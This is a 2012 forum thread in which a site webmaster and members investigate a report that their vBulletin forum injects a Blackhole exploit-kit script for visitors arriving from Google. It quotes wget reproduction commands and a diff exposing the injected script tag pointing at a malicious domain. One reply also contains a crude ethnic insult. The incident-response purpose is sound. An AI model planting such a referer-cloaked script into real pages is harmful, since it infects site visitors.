TechTalkz.com Logo Ask the Experts!

Go Back   TechTalkz.com Technology & Computer Troubleshooting Forums > Feed Back & Fire! > Feed Back

Malware Reported @ TechTalkz.com - Need your Help

Feed Back

 
Reply
Thread Tools Display Modes
Unread 22-11-2012, 04:16 PM   #1
Webmaster
Thread Starter
 
Strider's Avatar
 
Join Date: Nov 2005
Location: Interwebs
Posts: 5,056
Thanks: 637
Thanked 734 Times in 617 Posts
Mood: Busy
Blog Entries: 6
Rep Power: 9052 Strider is extemly EminentStrider is extemly EminentStrider is extemly EminentStrider is extemly EminentStrider is extemly EminentStrider is extemly EminentStrider is extemly EminentStrider is extemly EminentStrider is extemly EminentStrider is extemly EminentStrider is extemly Eminent

Intel Nvidia

Windows Server Windows 7 Windows 10 Linux


Question Malware Reported @ TechTalkz.com - Need your Help

Hello guys,

I found the following email in my inbox. Can you please try to replicate it? We need feedback from various browsers, OS, with/without all techtalkz.com cookies removed etc.

Code:
Hi,

I work in the information security team for a software company. For the
last month or more we have seen your site techtalkz.com redirecting
visitors to a malicious site using the blackhole expoit kit.

This only occurs when you visit the your site using a particular User
Agent and Referer header (google.com). The following Linux commands
illustrate this behaviour:


$ wget -U 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64;
Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR
3.0.30729; Media Center PC 6.0)' --referer 'http://www.google.com'
http://www.techtalkz.com/windows-7/516049-how-change-font-size-icon-size-windows-7-a.html

$ wget -U 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64;
Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR
3.0.30729; Media Center PC 6.0)'
http://www.techtalkz.com/windows-7/516049-how-change-font-size-icon-size-windows-7-a.html

$ ls -l
total 192
-rw-rw-r--. 95481 Nov  8 13:52
516049-how-change-font-size-icon-size-windows-7-a.html
-rw-rw-r--. 95373 Nov  8 13:53
516049-how-change-font-size-icon-size-windows-7-a.html.1

$ diff 516049-how-change-font-size-icon-size-windows-7-a.html*
364d363
< <script type="text/javascript"
src="http://gurmanaskgaard.org/173190.js?735163&025fed828c35e1fa"></script>
3292c3291
< <div class="smallfont" align="center">All times are GMT +1. The time
now is <span class="time">04:52 AM</span>.</div>
---
> <div class="smallfont" align="center">All times are GMT +1. The time
now is <span class="time">04:53 AM</span>.</div>


Someone has most likely hacked your hosting service and modified your
.htaccess files to produce this behaviour - that would probably be a
good place to start looking for a problem.

If you could fix this up, it would prevent a lot of people being
infected with viruses.

Thanks,
*****.
Thanks
Strider

Sponsored Links

Last edited by Strider; 26-11-2012 at 02:03 PM..
Strider is offline   Reply With Quote
The Following 2 Users Say Thank You to Strider For This Useful Post:
foxfox10 (03-05-2013), hallhall10 (03-05-2013)
Unread 22-11-2012, 05:19 PM   #2
Tachikoma
 
habibjp's Avatar
 
Join Date: Dec 2009
Location: Leeds
Age: 23
Posts: 2,913
Thanks: 94
Thanked 431 Times in 375 Posts
Mood: Innocent
Blog Entries: 9
Rep Power: 2487 habibjp is just Greathabibjp is just Greathabibjp is just Greathabibjp is just Greathabibjp is just Greathabibjp is just Greathabibjp is just Greathabibjp is just Greathabibjp is just Greathabibjp is just Greathabibjp is just Great

AMD ATi

Windows 10 Linux


Re: Malware Reported @ TechTalkz.com - Need your Help

Haven't Got linux on any of my computers atm but the referenced link doesn't redirect or spout any warnings in Chrome, FF or IE.
__________________
FX 4170 @4.8 w/H110
Sabertooth 990FX
XMS3 8GB
840 EVO 250GB
XFX 7870
Corsair GS500
X-Fi
Logitech Z506
---------------------------------------------
I aim to misbehave.
habibjp is offline   Reply With Quote
The Following 2 Users Say Thank You to habibjp For This Useful Post:
foxfox10 (03-05-2013), hallhall10 (03-05-2013)
Unread 22-11-2012, 05:20 PM   #3
Tachikoma
 
habibjp's Avatar
 
Join Date: Dec 2009
Location: Leeds
Age: 23
Posts: 2,913
Thanks: 94
Thanked 431 Times in 375 Posts
Mood: Innocent
Blog Entries: 9
Rep Power: 2487 habibjp is just Greathabibjp is just Greathabibjp is just Greathabibjp is just Greathabibjp is just Greathabibjp is just Greathabibjp is just Greathabibjp is just Greathabibjp is just Greathabibjp is just Greathabibjp is just Great

AMD ATi

Windows 10 Linux


Re: Malware Reported @ TechTalkz.com - Need your Help

Might be worth seeing if any other sites on the hosting service have had the same problem?
__________________
FX 4170 @4.8 w/H110
Sabertooth 990FX
XMS3 8GB
840 EVO 250GB
XFX 7870
Corsair GS500
X-Fi
Logitech Z506
---------------------------------------------
I aim to misbehave.
habibjp is offline   Reply With Quote
The Following 2 Users Say Thank You to habibjp For This Useful Post:
foxfox10 (03-05-2013), hallhall10 (03-05-2013)
Unread 22-11-2012, 05:44 PM   #4
Elite Member (1000+)
 
echo off's Avatar
 
Join Date: Mar 2010
Location: Folkestone, UK
Posts: 2,449
Thanks: 240
Thanked 432 Times in 378 Posts
Mood: Tired
Blog Entries: 10
Rep Power: 6347 echo off is extemly Distinguishedecho off is extemly Distinguishedecho off is extemly Distinguishedecho off is extemly Distinguishedecho off is extemly Distinguishedecho off is extemly Distinguishedecho off is extemly Distinguishedecho off is extemly Distinguishedecho off is extemly Distinguishedecho off is extemly Distinguishedecho off is extemly Distinguished

Intel Nvidia

Windows 98 / Windows ME Windows NT / Windows 2000 Windows XP Windows Vista Windows 7 Linux Mac OS


Re: Malware Reported @ TechTalkz.com - Need your Help

Hmm, I got rid of linux on my machine. But It's weird how some security analyst completely out of the blue says this, bit dodgy to me.
echo off is offline   Reply With Quote
The Following 2 Users Say Thank You to echo off For This Useful Post:
foxfox10 (03-05-2013), hallhall10 (03-05-2013)
Unread 22-11-2012, 05:54 PM   #5
Webmaster
Thread Starter
 
Strider's Avatar
 
Join Date: Nov 2005
Location: Interwebs
Posts: 5,056
Thanks: 637
Thanked 734 Times in 617 Posts
Mood: Busy
Blog Entries: 6
Rep Power: 9052 Strider is extemly EminentStrider is extemly EminentStrider is extemly EminentStrider is extemly EminentStrider is extemly EminentStrider is extemly EminentStrider is extemly EminentStrider is extemly EminentStrider is extemly EminentStrider is extemly EminentStrider is extemly Eminent

Intel Nvidia

Windows Server Windows 7 Windows 10 Linux


Re: Malware Reported @ TechTalkz.com - Need your Help

I don't think it's a lie because I remember seeing a warning from Norton web protection last month. I'll have a a look when I get back home.
Strider is offline   Reply With Quote
The Following 3 Users Say Thank You to Strider For This Useful Post:
echo off (22-11-2012), foxfox10 (03-05-2013), hallhall10 (03-05-2013)
Unread 22-11-2012, 06:12 PM   #6
Elite Member (1000+)
 
echo off's Avatar
 
Join Date: Mar 2010
Location: Folkestone, UK
Posts: 2,449
Thanks: 240
Thanked 432 Times in 378 Posts
Mood: Tired
Blog Entries: 10
Rep Power: 6347 echo off is extemly Distinguishedecho off is extemly Distinguishedecho off is extemly Distinguishedecho off is extemly Distinguishedecho off is extemly Distinguishedecho off is extemly Distinguishedecho off is extemly Distinguishedecho off is extemly Distinguishedecho off is extemly Distinguishedecho off is extemly Distinguishedecho off is extemly Distinguished

Intel Nvidia

Windows 98 / Windows ME Windows NT / Windows 2000 Windows XP Windows Vista Windows 7 Linux Mac OS


Re: Malware Reported @ TechTalkz.com - Need your Help

Quote:
Originally Posted by Strider View Post
I don't think it's a lie because I remember seeing a warning from Norton web protection last month. I'll have a a look when I get back home.
Hmm, OK, I've never had a warning.
echo off is offline   Reply With Quote
The Following 2 Users Say Thank You to echo off For This Useful Post:
foxfox10 (03-05-2013), hallhall10 (03-05-2013)
Unread 22-11-2012, 09:07 PM   #7
Elite Member (1000+)
 
maxmanrules's Avatar
 
Join Date: Nov 2009
Location: New Zealand
Posts: 1,118
Thanks: 237
Thanked 143 Times in 126 Posts
Mood: Goofy
Blog Entries: 3
Rep Power: 3118 maxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renowned

Intel ATi

Windows XP Windows Vista Linux


Re: Malware Reported @ TechTalkz.com - Need your Help

I just get a 404, but it's quite odd, the page for the 404 error is not the same as the standard techtalkz layout. The "Ask the experts" box is slightly offset to the left and the "Search" box looks different.

So do you want me to stick those commands into my console and then try to visit the address?
__________________
doctor octagonapus
O o
/ŻŻ/__o___O___o___O___o___O__
BBWWWWWAAAAAAAAAAAAAAAHH!!!
\__\ŻŻOŻŻŻoŻŻŻOŻŻŻoŻŻŻOŻŻŻoŻŻ
O o
http://www.youtube.com/watch?v=YC5dLKPAs5g
"Everything's better with pirates"
maxmanrules is offline   Reply With Quote
The Following 2 Users Say Thank You to maxmanrules For This Useful Post:
foxfox10 (03-05-2013), hallhall10 (03-05-2013)
Unread 22-11-2012, 09:46 PM   #8
Elite Member (1000+)
 
maxmanrules's Avatar
 
Join Date: Nov 2009
Location: New Zealand
Posts: 1,118
Thanks: 237
Thanked 143 Times in 126 Posts
Mood: Goofy
Blog Entries: 3
Rep Power: 3118 maxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renowned

Intel ATi

Windows XP Windows Vista Linux


Re: Malware Reported @ TechTalkz.com - Need your Help

OK, been doing some research on "Gurmanaskgaard.org"
If I try to visit it, my computer is automatically redirected to... Google. OK, onto the whois.
Firstly, it's registered out of China, using bizcn.com (really ****ing dodgy registrar)
The place it's registered to is either not built yet, or the google map for the area is quite old. The details, such as the mailing address and the company operator are fake.
Now, Mr Fake has also registered 255 other domains, probably for the same purpose.
So we're looking at the work of some Chinese wankers, obviously.
maxmanrules is offline   Reply With Quote
The Following 6 Users Say Thank You to maxmanrules For This Useful Post:
echo off (23-11-2012), foxfox10 (03-05-2013), habibjp (23-11-2012), hallhall10 (03-05-2013), Strider (26-11-2012), Wolfie276 (24-11-2012)
Unread 26-11-2012, 02:06 PM   #9
Webmaster
Thread Starter
 
Strider's Avatar
 
Join Date: Nov 2005
Location: Interwebs
Posts: 5,056
Thanks: 637
Thanked 734 Times in 617 Posts
Mood: Busy
Blog Entries: 6
Rep Power: 9052 Strider is extemly EminentStrider is extemly EminentStrider is extemly EminentStrider is extemly EminentStrider is extemly EminentStrider is extemly EminentStrider is extemly EminentStrider is extemly EminentStrider is extemly EminentStrider is extemly EminentStrider is extemly Eminent

Intel Nvidia

Windows Server Windows 7 Windows 10 Linux


Re: Malware Reported @ TechTalkz.com - Need your Help

@max: I've edited the first post to remove the BBCode. The most important part is this : --referer 'http://www.google.com'

i.e the malicious code is inserted to the html output only when the pages are opened via a Google search (>> with google.com as referer).

Btw. that domain is now redirecting to google.com (I assume it's taken down by the regitrar or an anti-cybercrime agency). But the exploit still remains in our website.


Update:

I found the issue reported in some other forums:

hacked by url123****** - vBulletin SEO Forums

Google redirecting to filestore123****** - vBulletin SEO Forums

Url123 Redirect. Tried everything, I am at wits end. - vBulletin SEO Forums

I'll try the suggestions in those threads when I get back home.

Last edited by Strider; 26-11-2012 at 02:15 PM..
Strider is offline   Reply With Quote
The Following 2 Users Say Thank You to Strider For This Useful Post:
foxfox10 (03-05-2013), hallhall10 (03-05-2013)
Unread 26-11-2012, 08:42 PM   #10
Elite Member (1000+)
 
maxmanrules's Avatar
 
Join Date: Nov 2009
Location: New Zealand
Posts: 1,118
Thanks: 237
Thanked 143 Times in 126 Posts
Mood: Goofy
Blog Entries: 3
Rep Power: 3118 maxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renownedmaxmanrules is extemly Renowned

Intel ATi

Windows XP Windows Vista Linux


Re: Malware Reported @ TechTalkz.com - Need your Help

Sponsored Links
Hmm, I can't get on those forums, they seem to be down.

Sponsored Links
maxmanrules is offline   Reply With Quote
The Following 2 Users Say Thank You to maxmanrules For This Useful Post:
foxfox10 (03-05-2013), hallhall10 (03-05-2013)
Reply

Tags
None

Thread Tools
Display Modes


Similar Threads
Thread Thread Starter Forum Replies Last Post
Old TechTalkz echo off General Discussions 9 09-02-2011 08:45 AM
TechTalkz Mail - TechTalkz.com in association with Google! Strider Announcements & News 84 30-10-2010 03:06 AM
Hi techtalkz Lochie Introduce Yourself! 4 26-08-2010 04:56 PM
An RSS for TechTalkz? Comptronic Feed Back 0 31-07-2010 01:08 AM
new to techtalkz abburidah Introduce Yourself! 2 01-03-2007 01:02 AM


< Home - Windows Help - MS Office Help - Hardware Support >


New To Site? Need Help?

All times are GMT. The time now is 12:51 AM.


vBulletin, Copyright ©2000 - 2017, Jelsoft Enterprises Ltd.
Copyright © 2005-2016, TechTalkz.com. All Rights Reserved - Privacy Policy
Valid XHTML 1.0 Transitional